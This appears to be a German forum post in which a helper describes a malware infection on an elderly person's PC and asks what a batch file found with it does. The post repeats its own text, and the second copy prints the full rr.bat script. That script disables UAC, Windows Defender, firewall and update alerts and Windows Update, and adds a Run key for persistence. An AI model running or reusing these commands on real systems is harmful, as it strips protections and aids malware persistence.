JamesFunk
Commodore
- Registriert
- Okt. 2012
- Beiträge
- 4.643
Hi,
ich habe gerade einen Anruf von jemandem bekommen, den ich beim Umgang mit seinem PC betreue.
Bei seinem Computer ging das Internet nicht mehr.
Ich habe erst gedacht, dass das keine große Sache ist, es hat sich aber rausgestellt, das da Schadsoftware am Werk ist.
Grundsätzlich ist das kein Problem. Ich habe immer gepredigt, die privaten Daten auf einer Festplatte D zu speichern, das System liegt auf C. Das sind keien Partitionen, sondern zwei physikalische Festplatten.
Datensicherungen (Festplattenclones) habe ich bei meinen Besuchen regelmäßig gemacht.
Das Ding ist jetzt nur, dass ich recht viel zu tun habe und es der Senior nicht schaffen wird, die Sicherung wieder einzuspielen bzw. die Festplatte C zu tauschen. Ich möchte das auch nicht, weil ich dann (im erneuten Schadensfall) keine einwandfreie Sicherung mehr habe.
Der PC muss also irgendwie zum Laufen gebracht werden. Ich habe es übers Telefon schnell geschafft, dass er en PC in den "abgesicherten Modus mit Netzwerktreibern" bootet. Dann wurde Teamviewer gestartet, ich habe jetzt Zugriff.
Über die msconfig ist mir direkt aufgefallen, dass da ein verdächtiges Element ist:
Systemstartelement: AS2014
Hersteller: Unbekannt
Befehl: C:\ProgramData\3XrRpDUr\3XrRpDUr.exe
Ort: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
In dem Ordner C:\ProgramData\3XrRpDUr sind diese Datein:
3XrRpDUr.exe
3XrRpDUr.exe.manifest
3XrRpDUr.ico
3XrRpDUrgaDXsaSD.in
3XrRpDUrgaDXsaSD.lg
1934904736011915655.exe
1934905690243886256.exe
DD1
DD2
DD3
rr.bat
Der Inhalt der rr.bat ist:
Aktuell läut Malwarebytes-Anti-Malware.
Die infizierten Dateien werde ich natürlich löschen. Genauso wie den Ordner C:\ProgramData\3XrRpDUr (inkl. Inhalt).
Mich interessiert jetzt noch, was durch diese Batch Datei gemacht wurde, was potentiell rückgängig gemacht werden sollte.
Die Dateien aus dem Ordner C:\ProgramData\3XrRpDUr sind alle von heute nachmittag.
Onlinebanking oder andere Sachen, bei denen großer Schaden zu befürchten ist, wird nicht verwendet. Auch kein ebay/amazon.
Es geht jetzt einzig darum, den PC wieder lauffähig zu bekommen, bis ich in zwei Wochen wieder da bin und die infizierte mit der gesicherten Festplatte austauschen kann. Danach werde ich die infizierte formatieren und ein neues Backup erstellen.
Es wäre super, wenn mir jemand erklären kann, was die .bat Datei alles macht/gemacht hat.
Danke und Gruß,
James
ich habe gerade einen Anruf von jemandem bekommen, den ich beim Umgang mit seinem PC betreue.
Bei seinem Computer ging das Internet nicht mehr.
Ich habe erst gedacht, dass das keine große Sache ist, es hat sich aber rausgestellt, das da Schadsoftware am Werk ist.
Grundsätzlich ist das kein Problem. Ich habe immer gepredigt, die privaten Daten auf einer Festplatte D zu speichern, das System liegt auf C. Das sind keien Partitionen, sondern zwei physikalische Festplatten.
Datensicherungen (Festplattenclones) habe ich bei meinen Besuchen regelmäßig gemacht.
Das Ding ist jetzt nur, dass ich recht viel zu tun habe und es der Senior nicht schaffen wird, die Sicherung wieder einzuspielen bzw. die Festplatte C zu tauschen. Ich möchte das auch nicht, weil ich dann (im erneuten Schadensfall) keine einwandfreie Sicherung mehr habe.
Der PC muss also irgendwie zum Laufen gebracht werden. Ich habe es übers Telefon schnell geschafft, dass er en PC in den "abgesicherten Modus mit Netzwerktreibern" bootet. Dann wurde Teamviewer gestartet, ich habe jetzt Zugriff.
Über die msconfig ist mir direkt aufgefallen, dass da ein verdächtiges Element ist:
Systemstartelement: AS2014
Hersteller: Unbekannt
Befehl: C:\ProgramData\3XrRpDUr\3XrRpDUr.exe
Ort: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
In dem Ordner C:\ProgramData\3XrRpDUr sind diese Datein:
3XrRpDUr.exe
3XrRpDUr.exe.manifest
3XrRpDUr.ico
3XrRpDUrgaDXsaSD.in
3XrRpDUrgaDXsaSD.lg
1934904736011915655.exe
1934905690243886256.exe
DD1
DD2
DD3
rr.bat
Der Inhalt der rr.bat ist:
Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sC StOp wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc.exe config wuauserv start= disabled
sC config wscsvc start= disabled
sc.exe config luafv start= disabled
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v FirewallDisableNotify /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v FirewallOverride /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v UpdatesDisableNotify /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP\Clients" /va /f
sC StOp WinDefend
sC StOp msmpsvc
sC StOp wuauserv
reG adD "HKLM\SOFTWARE\Microsoft\Security Center\Svc" /v AntiVirusOverride /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AS2014 /t REG_SZ /d "C:\ProgramData\3XrRpDUr\3XrRpDUr.exe" /f
Aktuell läut Malwarebytes-Anti-Malware.
Die infizierten Dateien werde ich natürlich löschen. Genauso wie den Ordner C:\ProgramData\3XrRpDUr (inkl. Inhalt).
Mich interessiert jetzt noch, was durch diese Batch Datei gemacht wurde, was potentiell rückgängig gemacht werden sollte.
Die Dateien aus dem Ordner C:\ProgramData\3XrRpDUr sind alle von heute nachmittag.
Onlinebanking oder andere Sachen, bei denen großer Schaden zu befürchten ist, wird nicht verwendet. Auch kein ebay/amazon.
Es geht jetzt einzig darum, den PC wieder lauffähig zu bekommen, bis ich in zwei Wochen wieder da bin und die infizierte mit der gesicherten Festplatte austauschen kann. Danach werde ich die infizierte formatieren und ein neues Backup erstellen.
Es wäre super, wenn mir jemand erklären kann, was die .bat Datei alles macht/gemacht hat.
Danke und Gruß,
James